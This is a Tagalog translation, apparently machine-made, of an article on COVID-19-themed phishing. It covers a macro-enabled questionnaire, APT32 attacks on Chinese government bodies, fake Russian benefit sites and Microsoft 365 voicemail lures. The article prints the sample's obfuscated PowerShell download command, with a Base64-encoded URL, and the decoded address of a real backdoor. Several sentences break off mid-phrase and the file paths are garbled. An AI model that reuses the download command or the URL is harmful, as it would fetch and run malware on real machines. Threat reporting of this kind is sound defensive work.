Patuloy na sinasamantala ng mga umaatake ang paksang COVID-19, na lumilikha ng parami nang paraming banta para sa mga user na lubos na interesado sa lahat ng nauugnay sa epidemya. SA
Tandaan sa
Gusto mo ba ng libreng pagsusuri para sa COVID-19?
Ang isa pang makabuluhang halimbawa ng phishing na may temang coronavirus ay
Madali din ang pagkumbinsi sa karamihan ng mga user na paganahin ang mga macro. Upang gawin ito, ginamit ang isang karaniwang trick: upang punan ang questionnaire, kailangan mo munang paganahin ang mga macro, na nangangahulugang kailangan mong magpatakbo ng VBA script.
Tulad ng nakikita mo, ang script ng VBA ay espesyal na naka-mask mula sa mga antivirus.
Ang Windows ay may tampok na paghihintay kung saan ang application ay naghihintay ng /T <segundo> bago tanggapin ang default na "Oo" na sagot. Sa aming kaso, ang script ay naghintay ng 65 segundo bago tanggalin ang mga pansamantalang file:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
At habang naghihintay, na-download ang malware. Isang espesyal na PowerShell script ang inilunsad para dito:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Pagkatapos i-decode ang Base64 value, dina-download ng PowerShell script ang backdoor na matatagpuan sa dating na-hack na web server mula sa Germany:
http://automatischer-staubsauger.com/feature/777777.png
at i-save ito sa ilalim ng pangalan:
C:UsersPublictmpdirfile1.exe
Folder βC:UsersPublictmpdirβ
ay tinanggal kapag pinapatakbo ang 'tmps1.bat' na file na naglalaman ng command cmd /c mkdir ""C:UsersPublictmpdir"".
Naka-target na pag-atake sa mga ahensya ng gobyerno
Bilang karagdagan, ang mga analyst ng FireEye ay nag-ulat kamakailan ng isang naka-target na pag-atake ng APT32 na naglalayong sa mga istruktura ng gobyerno sa Wuhan, pati na rin sa Chinese Ministry of Emergency Management. Ang isa sa mga ipinamahagi na RTF ay naglalaman ng isang link sa isang artikulo ng New York Times na pinamagatang
Kapansin-pansin, sa oras ng pagtuklas, wala sa mga antivirus ang nakakita sa pagkakataong ito, ayon sa Virustotal.
Kapag naka-down ang mga opisyal na website
Ang pinakakapansin-pansing halimbawa ng pag-atake ng phishing ay nangyari sa Russia noong isang araw lang. Ang dahilan nito ay ang paghirang ng isang pinakahihintay na benepisyo para sa mga batang may edad 3 hanggang 16 na taon. Nang ipahayag ang simula ng pagtanggap ng mga aplikasyon noong Mayo 12, 2020, milyun-milyon ang sumugod sa website ng Mga Serbisyo ng Estado para sa pinakahihintay na tulong at ibinaba ang portal na hindi mas masahol pa kaysa sa isang propesyonal na pag-atake ng DDoS. Nang sabihin ng pangulo na "Hindi nakayanan ng mga Serbisyo ng Gobyerno ang daloy ng mga aplikasyon," nagsimulang makipag-usap ang mga tao online tungkol sa paglulunsad ng isang alternatibong site para sa pagtanggap ng mga aplikasyon.
Ang problema ay ang ilang mga site ay nagsimulang gumana nang sabay-sabay, at habang ang isa, ang tunay sa posobie16.gosuslugi.ru, ay talagang tumatanggap ng mga aplikasyon, higit pa
Nakakita ang mga kasamahan mula sa SearchInform ng humigit-kumulang 30 bagong mapanlinlang na domain sa .ru zone. Ang Infosecurity at Softline Company ay nasubaybayan ang higit sa 70 katulad na mga pekeng website ng serbisyo ng gobyerno mula noong simula ng Abril. Ang kanilang mga tagalikha ay nagmamanipula ng mga pamilyar na simbolo at gumagamit din ng mga kumbinasyon ng mga salitang gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, at iba pa.
Hype at social engineering
Kinukumpirma lang ng lahat ng mga halimbawang ito na matagumpay na pinagkakakitaan ng mga umaatake ang paksa ng coronavirus. At kung mas mataas ang panlipunang tensyon at mas hindi malinaw na mga isyu, mas maraming pagkakataon ang mga scammer na magnakaw ng mahalagang data, pilitin ang mga tao na ibigay ang kanilang pera nang mag-isa, o mag-hack ng mas maraming computer.
At dahil ang pandemya ay pinilit ang mga potensyal na hindi handa na mga tao na magtrabaho mula sa bahay nang maramihan, hindi lamang personal, kundi pati na rin ang data ng korporasyon ay nasa panganib. Halimbawa, kamakailan ang mga gumagamit ng Microsoft 365 (dating Office 365) ay sumailalim din sa pag-atake ng phishing. Nakatanggap ang mga tao ng napakalaking "na-miss" na voice message bilang mga attachment sa mga titik. Gayunpaman, ang mga file ay talagang isang HTML na pahina na nagpadala ng mga biktima ng pag-atake sa
Pinagmulan: www.habr.com